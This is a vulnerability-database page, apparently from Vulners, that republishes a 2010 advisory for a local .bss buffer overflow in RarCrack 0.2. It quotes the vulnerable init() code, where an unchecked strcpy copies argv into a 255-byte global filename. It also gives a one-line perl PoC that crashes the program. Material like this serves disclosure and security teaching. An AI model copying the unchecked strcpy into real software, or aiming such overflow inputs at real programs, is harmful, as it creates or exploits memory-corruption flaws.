Vulners
Lucene search
RarCrack 0.2 - 'Filename init() .bss' (PoC)
The software can be downloaded here: http://rarcrack.sourceforge.net/
# Author: stoke
# Date: 2010-09-20
# Download: http://rarcrack.sourceforge.net/
# Tested on: Backtrack 4
#############################
Site: http://devilcode.it | http://hack2web.altervista.org
Special greetz to: nex, for reassure me when i sayed "WHY EIP IT'S NOT CHANGED!!!!!!!?!!!"
____ ___ __ __
/\ _`\ __/\_ \ /'__`\ /\ \
\ \ \/\ \ __ __ __/\_\//\ \ ___ /\ \/\ \ \_\ \ __ ___ _ __ __ __ __ __
\ \ \ \ \ /'__`\\ \/\ \/\ \\ \ \ /'___\ \ \ \ \ /'_` \ /'__`\ /'___\\`'__\'__`\\ \/\ \/\ \
\ \ \_\ \\ __/ \ \_/ | \ \\_\ \_/\ \__/\ \ \_\ \\ \L\ \/\ __/ /\ \__/ \ \/\ __/ \ \_/ \_/ \
\ \____/ \____\ \___/ \ \_\\____\ \____\\ \____/ \___,_\ \____\ \ \____\ \_\ \____\ \___x___/'
\/___/ \/____/\/__/ \/_//____/\/____/ \/___/ \/__,_ /\/____/ \/____/\/_/\/____/\/__//__/
Crew Members: bl3ck, stoke, Shellcoder_, n1md4, sys.x4sh, Ax3L, s1y, LostPassword, nex & overmind
############################
RarCrack v0.2 bss overflow PoC
###########################################
Function affected: init();
Type: local;
Variable overflowed: filename;
###########################################
########################################################
Here we have:
----- Start useful code snip --------
char filename[255];
----- End useful code snip ----------
This variable is above the "main" function, so is global and allocated on .bss.
In init() function we have:
---- Start useful code snip ----
if (strcmp(argv[i],"--help") == 0) {
printf("Usage: rarcrack encrypted_archive.ext [--threads NUM] [--type rar|zip|7z]\n\n");
printf("Options: --help: show this screen.\n");
printf(" --type: you can specify the archive program, this needed when\n");
printf(" the program couldn't detect the proper file type\n");
printf(" --threads: you can specify how many threads\n");
printf(" will be run, maximum 12 (default: 2)\n\n");
printf("Info: This program supports only RAR, ZIP and 7Z encrypted archives.\n");
printf(" RarCrack! usually detects the archive type.\n\n");
help = 1;
break;
} else if (strcmp(argv[i],"--threads") == 0) {
if ((i + 1) < argc) {
sscanf(argv[++i], "%d", &threads);
if (threads < 1) threads = 1;
if (threads > 12) {
printf("INFO: number of threads adjusted to 12\n");
threads = 12;
}
} else {
printf("ERROR: missing parameter for option: --threads!\n");
help = 1;
}
} else if (strcmp(argv[i],"--type") == 0) {
if ((i + 1) < argc) {
sscanf(argv[++i], "%s", &test);
for (j = 0; strcmp(TYPE[j], "") != 0; j++) {
if (strcmp(TYPE[j], test) == 0) {
strcpy(finalcmd, CMD[j]);
archive_type = j;
break;
}
}
if (archive_type < 0) {
printf("WARNING: invalid parameter --type %s!\n", argv[i]);
finalcmd[0] = '\0';
}
} else {
printf("ERROR: missing parameter for option: --type!\n");
help = 1;
}
} else {
strcpy((char*)&filename, argv[i]);
---- Stop useful code snip ----
How you can see, at the end of this code we have a strcpy to our "filename" variable, so, if you put more than 255 bytes in an argv, you will have a Segmentation Fault.
###########################################################################
###########################################################################
PoC
./rarcrack `perl -e 'print "A" x500'`
###########################################################################
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Sep 2010 00:00Current
7.4High risk
Vulners AI Score7.4